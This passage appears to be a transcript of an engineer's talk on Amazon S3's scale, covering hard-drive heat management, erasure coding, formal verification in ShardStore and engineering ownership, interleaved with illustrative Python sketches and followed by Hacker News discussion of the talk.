Now let's compare it to the largest HDD that you can buy as of publishing this, which is a Western Digital Ultrastar DC HC670 26TB. Since the RAMAC, capacity has improved 7.2M times over, while the physical drive has gotten 5,000x smaller. It's 6 billion times cheaper per byte in inflation-adjusted dollars. But despite all that, seek times – the time it takes to perform a random access to a specific piece of data on the drive – have only gotten 150x better. Why? Because they're mechanical. We have to wait for an arm to move, for the platter to spin, and those mechanical aspects haven't really improved at the same rate. If you are doing random reads and writes to a drive as fast as you possibly can, you can expect about 120 operations per second. The number was about the same in 2006 when S3 launched, and it was about the same even a decade before that.
This tension between HDDs growing in capacity but staying flat for performance is a central influence on S3's design. We need to scale the number of bytes we store by moving to the largest drives we can as aggressively as we can. Today's largest drives are 26TB, and industry roadmaps are pointing at a path to 200TB (200TB drives!) in the next decade. At that point, if we divide up our random accesses fairly across all our data, we will only be able to do 1 I/O per second per 2TB of data on disk.
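To make that arithmetic concrete, here's a quick back-of-the-envelope sketch in Python; the ~120 random IOPS figure and the drive capacities come from the text above, and the rest is just division:

# Back-of-the-envelope: random IOPS per terabyte as drive capacity grows,
# assuming mechanical seek performance stays roughly flat at ~120 IOPS/drive.
RANDOM_IOPS_PER_DRIVE = 120

for capacity_tb in [4, 16, 26, 200]:
    iops_per_tb = RANDOM_IOPS_PER_DRIVE / capacity_tb
    tb_per_iops = capacity_tb / RANDOM_IOPS_PER_DRIVE
    print(f"{capacity_tb:>4} TB drive: {iops_per_tb:6.2f} IOPS per TB "
          f"(~1 I/O per second per {tb_per_iops:.2f} TB)")

# A 200 TB drive at ~120 IOPS works out to roughly 1 random I/O per second
# for every ~1.7 TB stored -- the same ballpark as the figure in the post.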
S3 doesn't have 200TB drives yet, but I can tell you that we anticipate using them when they're available. And all the drive sizes between here and there.
So, with all this in mind, one of the biggest and most interesting technical scale problems that I've encountered is in managing and balancing I/O demand across a really large set of hard drives. In S3, we refer to that problem as heat management.
By heat, I mean the number of requests that hit a given disk at any point in time. If we do a bad job of managing heat, then we end up focusing a disproportionate number of requests on a single drive, and we create hotspots because of the limited I/O that's available from that single disk. For us, this becomes an optimization challenge of figuring out how we can place data across our disks in a way that minimizes the number of hotspots.
Hotspots are small numbers of overloaded drives in a system that end up getting bogged down, resulting in poor overall performance for requests dependent on those drives. When you get a hot spot, things don't fall over, but you queue up requests and the customer experience is poor. Unbalanced load stalls requests that are waiting on busy drives, those stalls amplify up through layers of the software storage stack, they get amplified by dependent I/Os for metadata lookups or erasure coding, and they result in a very small proportion of higher latency requests — or "stragglers". In other words, hotspots at individual hard disks create tail latency, and ultimately, if you don't stay on top of them, they grow to eventually impact all request latency.
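To see why a single overloaded disk drags on tail latency, here is a tiny, idealized queueing sketch using the M/M/1 mean-response-time formula W = 1/(mu - lambda); the service rate and utilization levels are illustrative numbers, not S3's real figures:

# Idealized illustration of why hotspots create stragglers: mean response
# time on one disk as its load approaches its service capacity (M/M/1 model).
SERVICE_RATE = 120.0  # requests/second one disk can serve (illustrative)

def mean_response_time_ms(arrival_rate: float) -> float:
    """Mean queueing + service time, in milliseconds (W = 1 / (mu - lambda))."""
    if arrival_rate >= SERVICE_RATE:
        return float("inf")  # unstable: the queue grows without bound
    return 1000.0 / (SERVICE_RATE - arrival_rate)

for utilization in [0.5, 0.8, 0.95, 0.99]:
    arrivals = utilization * SERVICE_RATE
    print(f"disk at {utilization:>4.0%} utilization -> "
          f"~{mean_response_time_ms(arrivals):7.1f} ms mean response time")

# Going from 50% to 99% utilization inflates mean response time by ~50x,
# which is exactly the straggler behaviour that a hotspot produces.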
As S3 scales, we want to be able to spread heat as evenly as possible, and let individual users benefit from as much of the HDD fleet as possible. This is tricky, because we don't know when or how data is going to be accessed at the time that it's written, and that's when we need to decide where to place it. Before joining Amazon, I spent time doing research and building systems that tried to predict and manage this I/O heat at much smaller scales – like local hard drives or enterprise storage arrays – and it was basically impossible to do a good job of it. But this is a case where the sheer scale, and the multitenancy of S3, result in a system that is fundamentally different.
The more workloads we run on S3, the more that individual requests to objects become decorrelated with one another. Individual storage workloads tend to be really bursty, in fact, most storage workloads are completely idle most of the time and then experience sudden load peaks when data is accessed. That peak demand is much higher than the mean. But as we aggregate millions of workloads a really, really cool thing happens: the aggregate demand smooths and it becomes way more predictable. In fact, and I found this to be a really intuitive observation once I saw it at scale, once you aggregate to a certain scale you hit a point where it is difficult or impossible for any given workload to really influence the aggregate peak at all! So, with aggregation flattening the overall demand distribution, we need to take this relatively smooth demand rate and translate it into a similarly smooth level of demand across all of our disks, balancing the heat of each workload.
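Here's a small simulation sketch of that smoothing effect: many individually bursty workloads, each idle most of the time, summed into an aggregate whose peak-to-mean ratio is far lower. The burst shapes, counts, and sizes are invented purely for illustration.

# Illustrative simulation: individual workloads are bursty (idle most of the
# time, occasional sharp peaks), but their aggregate is comparatively smooth.
import random

random.seed(42)
TICKS, WORKLOADS = 1_000, 5_000

def bursty_workload():
    """A workload that is idle ~99% of the time and bursts occasionally."""
    return [random.uniform(50, 100) if random.random() < 0.01 else 0.0
            for _ in range(TICKS)]

workloads = [bursty_workload() for _ in range(WORKLOADS)]
aggregate = [sum(w[t] for w in workloads) for t in range(TICKS)]

def peak_to_mean(series):
    return max(series) / (sum(series) / len(series))

sample = next(w for w in workloads if sum(w) > 0)  # a typical single workload
print("single workload peak/mean:", round(peak_to_mean(sample), 1))
print("aggregate peak/mean:      ", round(peak_to_mean(aggregate), 2))
# A single workload's peak is roughly two orders of magnitude above its mean;
# the aggregate's peak is only a small factor above its mean, which is what
# makes fleet-level demand predictable enough to balance.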
In storage systems, redundancy schemes are commonly used to protect data from hardware failures, but redundancy also helps manage heat. They spread load out and give you an opportunity to steer request traffic away from hotspots. As an example, consider replication as a simple approach to encoding and protecting data. Replication protects data if disks fail by just having multiple copies on different disks. But it also gives you the freedom to read from any of the disks. When we think about replication from a capacity perspective it's expensive. However, from an I/O perspective – at least for reading data – replication is very efficient.
We obviously don't want to pay a replication overhead for all of the data that we store, so in S3 we also make use of erasure coding. For example, we use an erasure code such as Reed-Solomon to split our object into a set of k "identity" shards. Then we generate an additional set of m parity shards. As long as k of the (k+m) total shards remain available, we can read the object. This approach lets us reduce capacity overhead while surviving the same number of failures.
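S3's real encoding is Reed-Solomon-based; as a much-simplified stand-in for the k-plus-m shard idea, here's a toy sketch with k data shards and a single XOR parity shard (so, unlike a real (k, m) code, it can only survive the loss of one shard):

# Toy stand-in for erasure coding: k data shards plus ONE XOR parity shard.
# Real codes like Reed-Solomon generate m parity shards and survive the loss
# of any m shards; this simplified sketch survives the loss of exactly one.

def split_into_shards(data: bytes, k: int):
    """Split data into k equal-length 'identity' shards (zero-padded)."""
    shard_len = -(-len(data) // k)  # ceiling division
    padded = data.ljust(k * shard_len, b"\x00")
    return [padded[i * shard_len:(i + 1) * shard_len] for i in range(k)]

def xor_parity(shards):
    parity = bytearray(len(shards[0]))
    for shard in shards:
        for i, byte in enumerate(shard):
            parity[i] ^= byte
    return bytes(parity)

def recover_missing(shards, parity):
    """Rebuild at most one missing shard by XOR-ing parity with survivors."""
    missing = [i for i, s in enumerate(shards) if s is None]
    assert len(missing) <= 1, "single-parity toy code: at most one loss"
    if missing:
        rebuilt = bytearray(parity)
        for s in shards:
            if s is not None:
                for i, byte in enumerate(s):
                    rebuilt[i] ^= byte
        shards[missing[0]] = bytes(rebuilt)
    return shards

obj = b"hello, durable object storage!"
data_shards = split_into_shards(obj, k=5)
parity_shard = xor_parity(data_shards)

damaged = list(data_shards)
damaged[2] = None  # pretend the disk holding shard 2 is unavailable
restored = recover_missing(damaged, parity_shard)
assert b"".join(restored).rstrip(b"\x00") == obj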
So, redundancy schemes let us divide our data into more pieces than we need to read in order to access it, and that in turn provides us with the flexibility to avoid sending requests to overloaded disks, but there's more we can do to avoid heat. The next step is to spread the placement of new objects broadly across our disk fleet. While individual objects may be encoded across tens of drives, we intentionally put different objects onto different sets of drives, so that each customer's accesses are spread over a very large number of disks.
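As a rough illustration of that wide placement (fleet size and shard counts invented), here's a sketch that places each object's shards on a random subset of a large fleet and counts how many distinct disks one customer's bucket ends up touching:

# Illustrative placement sketch: each object's shards land on a random subset
# of a large disk fleet, so one customer's objects collectively touch a huge
# number of disks. Fleet size and shard count are invented for illustration.
import random

random.seed(7)
FLEET_SIZE = 1_000_000       # disks in the fleet (illustrative)
SHARDS_PER_OBJECT = 18       # e.g. k + m shards per object (illustrative)
OBJECTS_IN_BUCKET = 50_000

touched = set()
for _ in range(OBJECTS_IN_BUCKET):
    touched.update(random.sample(range(FLEET_SIZE), SHARDS_PER_OBJECT))

print(f"{OBJECTS_IN_BUCKET:,} objects -> shards on {len(touched):,} distinct disks")
# With independent placement, a bucket of tens of thousands of objects already
# has data on hundreds of thousands of different disks, which is what lets a
# single customer's burst fan out across so much of the fleet.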
There are two big benefits to spreading the objects within each bucket across lots and lots of disks:
For instance, look at the graph above. Think about that burst, which might be a genomics customer doing parallel analysis from thousands of Lambda functions at once. That burst of requests can be served by over a million individual disks. That's not an exaggeration. Today, we have tens of thousands of customers with S3 buckets that are spread across millions of drives. When I first started working on S3, I was really excited (and humbled!) by the systems work to build storage at this scale, but as I really started to understand the system I realized that it was the scale of customers and workloads using the system in aggregate that really allows it to be built differently, and building at this scale means that any one of those individual workloads is able to burst to a level of performance that just wouldn't be practical to build without this scale.
Beyond the technology itself, there are human factors that make S3 - or any complex system - what it is. One of the core tenets at Amazon is that we want engineers and teams to fail fast, and safely. We want them to always have the confidence to move quickly as builders, while still remaining completely obsessed with delivering highly durable storage. One strategy we use to help with this in S3 is a process called "durability reviews." It's a human mechanism that's not in the statistical 11 9s model, but it's every bit as important.
When an engineer makes changes that can result in a change to our durability posture, we do a durability review. The process borrows an idea from security research: the threat model. The goal is to provide a summary of the change, a comprehensive list of threats, then describe how the change is resilient to those threats. In security, writing down a threat model encourages you to think like an adversary and imagine all the nasty things that they might try to do to your system. In a durability review, we encourage the same "what are all the things that might go wrong" thinking, and really encourage engineers to be creatively critical of their own code. The process does two things very well:
When working through durability reviews we take the durability threat model, and then we evaluate whether we have the right countermeasures and protections in place. When we are identifying those protections, we really focus on identifying coarse-grained "guardrails". These are simple mechanisms that protect you from a large class of risks. Rather than nitpicking through each risk and identifying individual mitigations, we like simple and broad strategies that protect against a lot of stuff.
Another example of a broad strategy is demonstrated in a project we kicked off a few years back to rewrite the bottom-most layer of S3's storage stack – the part that manages the data on each individual disk. The new storage layer is called ShardStore, and when we decided to rebuild that layer from scratch, one guardrail we put in place was to adopt a really exciting set of techniques called "lightweight formal verification". Our team decided to shift the implementation to Rust in order to get type safety and structured language support to help identify bugs sooner, and even wrote libraries that extend that type safety to apply to on-disk structures. From a verification perspective, we built a simplified model of ShardStore's logic (also in Rust) and checked it into the same repository alongside the real production ShardStore implementation. This model dropped all the complexity of the actual on-disk storage layers and hard drives, and instead acted as a compact but executable specification. It wound up being about 1% of the size of the real system, but allowed us to perform testing at a level that would have been completely impractical to do against a hard drive with 120 available IOPS. We even managed to publish a paper about this work at SOSP.
From here, we've been able to build tools and use existing techniques, like property-based testing, to generate test cases that verify that the behaviour of the implementation matches that of the specification. The really cool bit of this work wasn't anything to do with either designing ShardStore or using formal verification tricks. It was that we managed to kind of "industrialize" verification, taking really cool, but kind of research-y, techniques for program correctness and getting them into code where normal engineers who don't have PhDs in formal verification can contribute to maintaining the specification, and that we could continue to apply our tools with every single commit to the software. Using verification as a guardrail has given the team confidence to develop faster, and it has endured even as new engineers joined the team.
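For a flavour of what checking an implementation against an executable reference model looks like (this is the general shape of the technique, not S3's actual code), here's a sketch using the Hypothesis property-based testing library, with a toy key-value store standing in for the real storage layer:

# Sketch of model-based, property-based testing: a toy key-value "store"
# implementation is checked against a trivially simple reference model on
# randomly generated operation sequences. (Hypothesis is a Python
# property-based testing library; this is NOT S3 code.)
from hypothesis import given, strategies as st

class ToyStore:
    """Stand-in for a storage layer; imagine it hides on-disk complexity."""
    def __init__(self):
        self._data = {}
    def put(self, key, value):
        self._data[key] = value
    def get(self, key):
        return self._data.get(key)
    def delete(self, key):
        self._data.pop(key, None)

operations = st.lists(
    st.tuples(st.sampled_from(["put", "get", "delete"]),
              st.text(min_size=1, max_size=4),
              st.binary(max_size=8)),
    max_size=50,
)

@given(operations)
def test_store_matches_model(ops):
    store, model = ToyStore(), {}          # model = executable specification
    for op, key, value in ops:
        if op == "put":
            store.put(key, value); model[key] = value
        elif op == "delete":
            store.delete(key); model.pop(key, None)
        else:
            assert store.get(key) == model.get(key)
    for key in model:                       # final states must agree too
        assert store.get(key) == model[key]

if __name__ == "__main__":
    test_store_matches_model()  # Hypothesis generates and runs many cases
    print("implementation matches the reference model on generated cases")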
Durability reviews and lightweight formal verification are two examples of how we take a really human, and organizational view of scale in S3. The lightweight formal verification tools that we built and integrated are really technical work, but they were motivated by a desire to let our engineers move faster and be confident even as the system becomes larger and more complex over time. Durability reviews, similarly, are a way to help the team think about durability in a structured way, but also to make sure that we are always holding ourselves accountable for a high bar for durability as a team. There are many other examples of how we treat the organization as part of the system, and it's been interesting to see how once you make this shift, you experiment and innovate with how the team builds and operates just as much as you do with what they are building and operating.
The last example of scale that I'd like to tell you about is an individual one. I joined Amazon as an entrepreneur and a university professor. I'd had tens of grad students and built an engineering team of about 150 people at Coho. In the roles I'd had in the university and in startups, I loved having the opportunity to be technically creative, to build really cool systems and incredible teams, and to always be learning. But I'd never had to do that kind of role at the scale of software, people, or business that I suddenly faced at Amazon.
One of my favourite parts of being a CS professor was teaching the systems seminar course to graduate students. This was a course where we'd read and generally have pretty lively discussions about a collection of "classic" systems research papers. One of my favourite parts of teaching that course was that about half way through it we'd read the SOSP Dynamo paper. I looked forward to a lot of the papers that we read in the course, but I really looked forward to the class where we read the Dynamo paper, because it was from a real production system that the students could relate to. It was Amazon, and there was a shopping cart, and that was what Dynamo was for. It's always fun to talk about research work when people can map it to real things in their own experience.
But also, technically, it was fun to discuss Dynamo, because Dynamo was eventually consistent, so it was possible for your shopping cart to be wrong.
I loved this, because it was where we'd discuss what you do, practically, in production, when Dynamo was wrong. When a customer was able to place an order only to later realize that the last item had already been sold. You detected the conflict but what could you do? The customer was expecting a delivery.
This example may have stretched the Dynamo paper's story a little bit, but it drove to a great punchline. Because the students would often spend a bunch of discussion trying to come up with technical software solutions. Then someone would point out that this wasn't it at all. That ultimately, these conflicts were rare, and you could resolve them by getting support staff involved and making a human decision. It was a moment where, if it worked well, you could take the class from being critical and engaged in thinking about tradeoffs and design of software systems, and you could get them to realize that the system might be bigger than that. It might be a whole organization, or a business, and maybe some of the same thinking still applied.
Now that I've worked at Amazon for a while, I've come to realize that my interpretation wasn't all that far from the truth — in terms of how the services that we run are hardly "just" the software. I've also realized that there's a bit more to it than what I'd gotten out of the paper when teaching it. Amazon spends a lot of time really focused on the idea of "ownership." The term comes up in a lot of conversations — like "does this action item have an owner?" — meaning who is the single person that is on the hook to really drive this thing to completion and make it successful.
The focus on ownership actually helps understand a lot of the organizational structure and engineering approaches that exist within Amazon, and especially in S3. To move fast, to keep a really high bar for quality, teams need to be owners. They need to own the API contracts with other systems their service interacts with, they need to be completely on the hook for durability and performance and availability, and ultimately, they need to step in and fix stuff at three in the morning when an unexpected bug hurts availability. But they also need to be empowered to reflect on that bug fix and improve the system so that it doesn't happen again. Ownership carries a lot of responsibility, but it also carries a lot of trust – because to let an individual or a team own a service, you have to give them the leeway to make their own decisions about how they are going to deliver it. It's been a great lesson for me to realize how much allowing individuals and teams to directly own software, and more generally own a portion of the business, allows them to be passionate about what they do and really push on it. It's also remarkable how much getting ownership wrong can have the opposite result.
I've spent a lot of time at Amazon thinking about how important and effective the focus on ownership is to the business, but also about how effective an individual tool it is when I work with engineers and teams. I realized that the idea of recognizing and encouraging ownership had actually been a really effective tool for me in other roles. Here's an example: In my early days as a professor at UBC, I was working with my first set of graduate students and trying to figure out how to choose great research problems for my lab. I vividly remember a conversation I had with a colleague who was also a pretty new professor at another school. When I asked them how they chose research problems with their students, they flipped. They had a surprisingly frustrated reaction. "I can't figure this out at all. I have like 5 projects I want students to do. I've written them up. They hum and haw and pick one up but it never works out. I could do the projects faster myself than I can teach them to do it."
And ultimately, that's actually what this person did — they were amazing, they did a bunch of really cool stuff, and wrote some great papers, and then went and joined a company and did even more cool stuff. But when I talked to grad students that worked with them what I heard was, "I just couldn't get invested in that thing. It wasn't my idea."
As a professor, that was a pivotal moment for me. From that point forward, when I worked with students, I tried really hard to ask questions, and listen, and be excited and enthusiastic. But ultimately, my most successful research projects were never mine. They were my students', and I was lucky to be involved. The thing that I don't think I really internalized until much later, working with teams at Amazon, was that one big contribution to those projects being successful was that the students really did own them. Once students really felt like they were working on their own ideas, and that they could personally evolve them and drive them to a new result or insight, it was never difficult to get them to really invest in the work and the thinking to develop and deliver it. They just had to own it.
And this is probably one area of my role at Amazon that I've thought about and tried to develop and be more intentional about than anything else I do. As a really senior engineer in the company, of course I have strong opinions and I absolutely have a technical agenda. But if I interact with engineers by just trying to dispense ideas, it's really hard for any of us to be successful. It's a lot harder to get invested in an idea that you don't own. So, when I work with teams, I've kind of taken the strategy that my best ideas are the ones that other people have instead of me. I consciously spend a lot more time trying to develop problems, and to do a really good job of articulating them, rather than trying to pitch solutions. There are often multiple ways to solve a problem, and picking the right one is letting someone own the solution. And I spend a lot of time being enthusiastic about how those solutions are developing (which is pretty easy) and encouraging folks to figure out how to have urgency and go faster (which is often a little more complex). But it has, very sincerely, been one of the most rewarding parts of my role at Amazon to approach scaling myself as an engineer being measured by making other engineers and teams successful, helping them own problems, and celebrating the wins that they achieve.
I came to Amazon expecting to work on a really big and complex piece of storage software. What I learned was that every aspect of my role was unbelievably bigger than that expectation. I've learned that the technical scale of the system is so enormous, that its workload, structure, and operations are not just bigger, but foundationally different from the smaller systems that I'd worked on in the past. I learned that it wasn't enough to think about the software, that "the system" was also the software's operation as a service, the organization that ran it, and the customer code that worked with it. I learned that the organization itself, as part of the system, had its own scaling challenges and provided just as many problems to solve and opportunities to innovate. And finally, I learned that to really be successful in my own role, I needed to focus on articulating the problems and not the solutions, and to find ways to support strong engineering teams in really owning those solutions.
I'm hardly done figuring any of this stuff out, but I sure feel like I've learned a bunch so far. Thanks for taking the time to listen.
S3 is more than storage. It is a standard. I like how you can get S3-compatible (usually with some small caveats) storage from a few places. I am not sure how open the standard is, and if you have to pay Amazon to say you are 'S3 compatible', but it is pretty cool.
Examples:
iDrive has E2, Digital Ocean has Object Storage, Cloudflare has R2, Vultr has Object Storage, Backblaze has B2
Google's GCS as well, and I haven't used Microsoft, but it'd be weird if they didn't also have an 'S3 compatible' option.
Edit: I looked it up and apparently no, Azure does not have one :-/
> Imagine a hard drive head as a 747 flying over a grassy field at 75 miles per hour. The air gap between the bottom of the plane and the top of the grass is two sheets of paper. Now, if we measure bits on the disk as blades of grass, the track width would be 4.6 blades of grass wide and the bit length would be one blade of grass. As the plane flew over the grass it would count blades of grass and only miss one blade for every 25 thousand times the plane circled the Earth.
The standing joke is that Americans love strange units of measure, but this one is so outré that it deserves an award.
> Now, let's go back to that first hard drive, the IBM RAMAC from 1956. Here are some specs on that thing:
> Storage Capacity: 3.75 MB
> Cost: ~$9,200/terabyte
Those specs can't possibly be correct. If you multiply the cost by the storage, the cost of the drive works out to 3¢.
This site[1] states,
> It stored about 2,000 bits of data per square inch and had a purchase price of about $10,000 per megabyte
So perhaps the specs should read $9,200 / megabyte? (Which would put the drive's cost at $34,500, which seems more plausible.)
[1]: https://www.historyofinformation.com/detail.php?entryid=952
https://en.m.wikipedia.org/wiki/IBM_305_RAMAC has the likely source of the error: 30M bits (using the 6 data bits but not parity), but it rented for $3k per month so you didn't have a set cost the same as buying a physical drive outright - very close to S3's model, though.
Must've put a decimal point in the wrong place or something. I always do that. I always mess up some mundane detail.
Working in genomics, I've dealt with lots of petabyte data stores over the past decade. Having used AWS S3, GCP GCS, and a raft of storage systems for collocated hardware (Ceph, Gluster, and an HP system whose name I have blocked from my memory), I have no small amount of appreciation for the effort that goes into operating these sorts of systems.
And the benefits of sharing disk IOPS with untold numbers of other customers are hard to overstate. I hadn't heard the term 'heat' as it's used in the article, but it's incredibly hard to mitigate on a single system. For our co-located hardware clusters, we would have to customize the batch systems to treat IO as an allocatable resource the same as RAM or CPU in order to manage it correctly across large jobs. S3 and GCP are super expensive, but the performance can be worth it.
This sort of article is some of the best of HN, IMHO.
As someone in this area: we very much want to make your EiB of data to feel local. It's hard and I'm sorry we only have 3.5 9's of read availability.
Some of the best HN indeed. Would love to see any links to HN posts that you think are similarly good!
It also explains some of the cost model for cloud storage. The best possible customer, from a cloud storage perspective, stores a whole lot of data but reads almost none of it. That's kind of like renting hard drives, except if you only fill some of each hard drive with the 'cold' data, you can still use the hard drive's full I/O capacity to handle the hot work. So, if you very carefully balance what sort of data is on which drive, you can keep all of the drives in use despite most of your data not being used. That's part of why storage is comparatively cheap but reads are comparatively expensive.
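A rough numerical sketch of that balancing act, with invented numbers: pack mostly-cold bytes onto each drive and reserve the spindle's limited IOPS for the thin hot slice that shares it.

# Back-of-the-envelope sketch of the "sell cold bytes, keep the IOPS" idea.
# All numbers here are invented for illustration, not real cloud economics.
DRIVE_CAPACITY_TB = 26
DRIVE_IOPS = 120

cold_fraction = 0.95                       # bytes stored but rarely read
cold_tb = DRIVE_CAPACITY_TB * cold_fraction
hot_tb = DRIVE_CAPACITY_TB - cold_tb

# If cold data consumes almost no I/O, nearly all 120 IOPS are available to
# serve the small hot slice that shares the same spindle.
print(f"{cold_tb:.1f} TB cold + {hot_tb:.1f} TB hot per drive")
print(f"~{DRIVE_IOPS / hot_tb:.0f} IOPS available per TB of hot data")

# Compare with filling the drive entirely with uniformly accessed data:
print(f"~{DRIVE_IOPS / DRIVE_CAPACITY_TB:.1f} IOPS per TB if access were uniform")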
Unfortunately many tools in genomics (and biotech in general) still depend on local filesystems – and even if they do support S3, performance is far slower than it could be.
> What's interesting here, when you look at the highest-level block diagram of S3's technical design, is the fact that AWS tends to ship its org chart. This is a phrase that's often used in a pretty disparaging way, but in this case it's absolutely fascinating.
I'd go even further: at this scale, it is essential and required in order to develop these kinds of projects with any sort of velocity.
Large organizations ship their communication structure by design. The alternative is engineering anarchy.
This is also why reorgs tend to be pretty common at large tech orgs.
They know they'll almost inevitably ship their org chart. And they'll encounter tons of process-based friction if they don't.
The solution: Change your org chart to match what you want to ship
Straight from The Mythical Man Month: Organizations which design systems are constrained to produce systems which are copies of the communication structures of these organizations.
I'll take the metaphor one step further. The architecture will, over time, inevitably change to resemble its org chart, therefore it is the job of a sufficiently senior technical lead to organize the teams in such a way that the correct architecture emerges.
How does S3 handle particularly hot objects? Is there some form of rebalancing to account for access rates?
I was disappointed too, this article was very light on details about the subject matter. I wasn't expecting a blue-print, but what was presented was all very hand-wavy.
In large systems (albeit smaller than S3) the way this works is that you slurp out some performance metrics from the storage system to identify your hot spots and then feed that into a service that actively moves stuff around (below the namespace of the filesystem though, so it will be fs-dependent). You have some higher-performance disk pools at your disposal, and obviously that would be NVMe storage today.
So in practice, it's likely proprietary vendor code chewing through performance data out of a proprietary storage controller and telling a worker job on a mounted filesystem client to move the hot data to the high performance disk pool. Always constantly rebalancing and moving data back out of the fast pool once it cools off. Obviously for S3 this is happening at an object level though using their own in-house code.
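A minimal sketch of that rebalancing loop (thresholds, tiers, and data structures are all invented for illustration):

# Minimal sketch of a heat-driven tiering loop like the one described above:
# periodically promote the hottest objects to a fast (e.g. NVMe) pool and
# demote objects that have cooled off. Thresholds and structures are invented.
from collections import defaultdict

HOT_THRESHOLD = 100      # requests per interval that qualify as "hot"
COLD_THRESHOLD = 10      # below this, hot objects get demoted again

fast_pool: set[str] = set()                       # keys currently on fast media
request_counts: dict[str, int] = defaultdict(int)

def record_request(key: str) -> None:
    request_counts[key] += 1

def rebalance() -> None:
    """Run once per interval: promote hot objects, demote cooled-off ones."""
    for key, count in request_counts.items():
        if count >= HOT_THRESHOLD and key not in fast_pool:
            fast_pool.add(key)         # in reality: copy data to the fast tier
        elif count <= COLD_THRESHOLD and key in fast_pool:
            fast_pool.discard(key)     # in reality: migrate back to the HDD pool
    request_counts.clear()             # start the next measurement interval

# Simulate one interval of traffic: one object is very hot, the others are not.
for _ in range(500):
    record_request("logs/2023/07/hot-object")
for i in range(20):
    record_request(f"archive/object-{i}")

rebalance()
print("fast pool now holds:", fast_pool)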
'As a really senior engineer in the company, of course I have strong opinions and I absolutely have a technical agenda. But If I interact with engineers by just trying to dispense ideas, it's really hard for any of us to be successful. It's a lot harder to get invested in an idea that you don't own. So, when I work with teams, I've kind of taken the strategy that my best ideas are the ones that other people have instead of me. I consciously spend a lot more time trying to develop problems, and to do a really good job of articulating them, rather than trying to pitch solutions. There are often multiple ways to solve a problem, and picking the right one is letting someone own the solution.'
'I learned that to really be successful in my own role, I needed to focus on articulating the problems and not the solutions, and to find ways to support strong engineering teams in really owning those solutions.'
I love this. Reminds me of the Ikea effect to an extent. Based on this, to get someone to be enthusiastic about what they do, you have to encourage ownership. And a great way is to have it be 'their idea'.
I don't mean this to be cynical, but I do think that it's worth acknowledging that describing the problem is also, in itself, a tool to guide people towards a solution they want. After all, people often disagree about what 'the problem' even is!
Fortunately not every problem is like this. But if you look at, say, discussions around Python's 'packaging problem' (and find people in fact describing like 6 different problems in very different ways), you can see this play out pretty nastily.
There's a saying that I'm often told, and I'm sure we've all heard it at some point 'don't bring me problems, bring me solutions'. It's such a shit comment to make.
I interpret it as if they are saying 'You plebe! I don't have time for your issues. I can't get promoted from your work if you only bring problems.'
Being able to solve the problem is being able to understand the problem and admit it exists first. <smacksMyDamnHead>
This only works if your team is made up of smart, competent people.
I strongly agree with this perspective but I wish it could be generalized into techniques that work in everyday life, where there isn't already this established ranking of expertise that focuses attention on what is being said and not whether you have the clout or the authority to say it.
Because absent pre-established perceived authority or expertise, which is the context most day-to-day problems surface in, holding forth and hogging the entire two-way discussion channel with your long, detailed, carefully articulated description of the problem is going to make you sound like someone who wants to do all the talking and none of the work, or the kind of person who doesn't want to share in finding a solution together with others.
That section really stood out to me as well.
If Andy Warfield is reading, and I bet he is, I have a question. When developing a problem, how valuable is it to sketch possible solutions? If you articulate the problem well, a few possible solutions probably spring to mind. Is it worth sharing those possible solutions to help kickstart the gears for potential owners? Or is it better to focus only on the problem and let the solution space be fully green?
Additionally, anyone have further reading for this type of "very senior IC" operation?
The things we could build if S3 specified a simple OAuth2-based protocol for delegating read/write access. The world needs an HTTP-based protocol for apps to access data on the user's behalf. Google Drive is the closest to this but it only has a single provider and other issues[0]. I'm sad remoteStorage never caught on. I really hope Solid does well but it feels too complex to me. My own take on the problem is https://gemdrive.io/, but it's mostly on hold while I'm focused on other parts of the self-hosting stack.
Apache Iceberg is kind of this, but more oriented around large data lake datasets.
Most apps, however, assume POSIX-like data access. I would love to see a client-side minimally dependent library that mounts a local directory that is actually the user's S3 bucket.
You can get close with a Cognito Identity Pool that exchanges your user's keys for AWS credentials associated with an IAM role that has access to the resources you want to read/write on their behalf. Pretty standard pattern.
https://docs.aws.amazon.com/cognito/latest/developerguide/co...
edit: I think I misread your comment. I understood it as your app wanting to delegate access to a user's data to the client, but it seems like you want the user to delegate access to their own data to your app? Different use-cases.
Such a system would be amazing. It would really force companies whose products are UIs on top of S3 to compete hard because adversarial interoperability would be an ever present threat from your competitors.
It really is such a shame that all the projects that tried/are trying to create data sovereignty for users became weird crypto.
Absolutely this. I would LOVE to be able to build apps that store people's data in their own S3 bucket, billed to their own account.
Doing that right now is monumentally difficult. I built an entire CLI app just for solving the 'issue AWS credentials that can only access this specific bucket' problem, but I really don't want to have to talk my users through installing and running something like that: https://s3-credentials.readthedocs.io/en/stable/
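One partial workaround that exists today (not the tool linked above, and not a full solution to the delegation problem) is to mint temporary credentials scoped to a single bucket using an STS federation token with an inline session policy. Here's a minimal boto3 sketch with a placeholder bucket name; note that the caller's own IAM permissions still cap what the resulting token can do.

# Minimal boto3 sketch: mint temporary credentials that can only touch one
# bucket, using an STS federation token with an inline session policy.
# The bucket name and duration are placeholders; the calling IAM principal
# also needs s3 access and sts:GetFederationToken for this to work.
import json
import boto3

BUCKET = "example-user-bucket"   # placeholder

policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["s3:ListBucket"],
            "Resource": f"arn:aws:s3:::{BUCKET}",
        },
        {
            "Effect": "Allow",
            "Action": ["s3:GetObject", "s3:PutObject"],
            "Resource": f"arn:aws:s3:::{BUCKET}/*",
        },
    ],
}

sts = boto3.client("sts")
token = sts.get_federation_token(
    Name="scoped-app-user",
    Policy=json.dumps(policy),
    DurationSeconds=3600,            # credentials expire after an hour
)
creds = token["Credentials"]
print("temporary key id:", creds["AccessKeyId"])
# Hand AccessKeyId / SecretAccessKey / SessionToken to the client; they are
# useless outside this one bucket and expire automatically.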
Great to see Amazon employees being allowed to talk openly about how S3 works behind the scenes. I would love to hear more about how Glacier works. As far as I know, they have never revealed what the underlying storage medium is, leading to a lot of wild speculation (tape? offline HDDs? custom HDDs?).
It's just low powered hard drives that aren't turned on all the time. Nothing special.
HSM is a neat technology, and there are lots of ways it has been implemented over the years. But it starts with a shim to insert some other technology into the middle of a typical POSIX filesystem. It has to tolerate the time penalty for data recovery of your favored HSM'd medium, but that's kind of the point. You can do it with a lower tier of disk, tape, wax cylinders, etc. There's no reason it wouldn't be tape though; tape capacity has kept up and HPSS continues to be developed. The traditional tape library vendors still pump out robotic tape libraries.
I remember installing 20+ fully configured IBM 3494 tape libraries for AT&T in the mid-2000's. These things were 20+ frames long with dual accessors (robots) in each. The robots were able to push a dead accessor out of the way into a 'garage' and continue working in the event one of them died (and this actually worked). Someone will have to invent a cheaper medium of storage than tape before tape will ever die.
